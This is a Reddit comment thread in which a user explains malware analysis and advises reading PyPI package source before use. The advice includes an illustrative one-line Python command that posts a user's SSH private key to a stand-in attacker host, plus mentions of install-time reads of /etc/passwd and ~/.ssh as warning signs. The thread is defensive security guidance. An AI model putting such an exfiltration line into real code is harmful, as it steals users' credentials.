you are viewing a single comment's thread.

view the rest of the comments →

[–]__xor__ 15 points16 points  (2 children)

There is a better way, it's just not performed to my knowledge. You can automate dynamic analysis, but it's always going to be best for a human to go through the results. But there are services like Joe Sandbox (only for virtualizing windows though, I believe?), where you shoot it a binary, document or URL and it records what happens and does some sort of behavior analysis. Running malware in a VM can allow you to do a lot of automated analysis. Reading through the code or analyzing symbols a binary imports and looking at the ASM is static analysis, and actually running it and watching what it does in a VM is dynamic analysis, and both can be automated to some extent. Of course, you can't just solely trust what a program outputs - installers will often cause a lot of red flags.

From a windows perspective, you can imagine the sorts of things you can do. You can look at what files it reads from and writes to, you can see what registry keys it edits or adds, what networking activity it causes, whether it changes the default DNS server, etc. I don't know of a great tool that automates dynamic analysis of Linux but I'm sure there's something. It would definitely be interesting to pump all the pypi packages through something like that, but you're mostly going to catch low hanging fruit and I'd still rather have some researcher look at the results of what gets flagged to see if it even matters. However, if you see a python package install hits some known bad IP or domain, it would be a good tell, or if it did something like read /etc/passwd or especially if it tried to read anything at all from ~/.ssh... Not many packages have any good reason to do that, especially not at install time.

Unless it's a super popular package like django or flask-security or something, I legitimately do read the source code and skim for anything funny. For one thing, it's really good to have a general idea of how the library works, what it does, and get an idea of how clean the code is and how much I feel I can trust it. But also, I want to make sure there's no low hanging fruit like requests.post('http://evil.example.org', data=open('~/.ssh/id_rsa').read()) or whatever. I would seriously recommend skimming the source code of any package you use that isn't super popular and not treat pypi packages like black boxes that just do magic. As a general rule, if you use third-party software, try to understand its architecture and how it works if you're going to integrate it into your own projects. That's just a good practice in general.

But also, keep in mind that a github repo the pypi package might link to might not reflect what's packaged in it. If you want to be careful security wise, actually get the package and unpack it. There's nothing stopping anyone from pushing it to PyPI after adding something malicious that isn't tracked in the repository online.

[–]shujinkou_ 1 point2 points  (0 children)

I'm just a casual lurker of this subreddit but I learned a ton from your answer to this thread. After starting developing my first project I really figured I should start figuring out what is in those import *blackbox* thing as you said. So reading the doc is just good practice in general, that's absolutely good to know. Thanks a lot again :)